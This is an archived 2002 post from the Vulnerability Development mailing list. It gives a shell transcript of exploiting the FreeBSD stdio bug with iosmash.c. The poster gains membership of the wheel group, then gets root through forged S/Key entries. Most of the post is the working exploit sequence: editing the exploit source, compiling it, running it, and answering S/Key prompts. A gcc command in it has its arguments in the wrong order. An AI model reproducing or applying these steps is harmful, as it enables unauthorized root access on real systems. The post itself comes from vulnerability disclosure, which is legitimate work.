Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

full info on iosmash.c as non wheel user

From: John Scimone <jscimone () cc gatech edu>
Date: Tue, 23 Apr 2002 22:25:36 +0000
from phased....

I didnt think such would be necessary but due to the high volume of emails it
has proved so, below is a transcript of exploiting the stdio bug on freebsd as 
a user not in the wheel group

Welcome to FreeBSD!

id

uid=1000(d0tslash) gid=1000(d0tslash) groups=1000(d0tslash)


grep wheel /etc/group

wheel:*:0:root,akt0r-root,misterx


perl -pi -e 's/root /misterx /g' iosmash.c
gcc -o iosmash.c iosmash
./iosmash

Adding d0tslash:
<--- HIT CTRL-C --->

grep 98 iosmash.c

  s/key 98 snosoft2
  98: MASS OAT ROLL TOOL AGO CAM
        "\nmisterx 0099 snosoft2        6f648e8bd0e2988a     Apr 23,2666
01:02:0
3\n");

su misterx

s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
%pwd
/usr/home/d0tslash
%id
uid=1001(misterx) gid=1001(misterx) groups=1001(misterx), 0(wheel),
1006(cvsusers)
%cd ~
%grep "root " iosmash.c
  decided to make a trivial exploit to easily get root :)
        "\nroot 0099 snosoft2   6f648e8bd0e2988a     Apr 23,2666 01:02:03\n");
%gcc -o iosmash iosmash.c
%./iosmash
Updating misterx:
Old key: snosoft2
<--- HIT CTRL-C --->
%su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes#
Previous By Date Next
Previous By Thread Next

Current thread: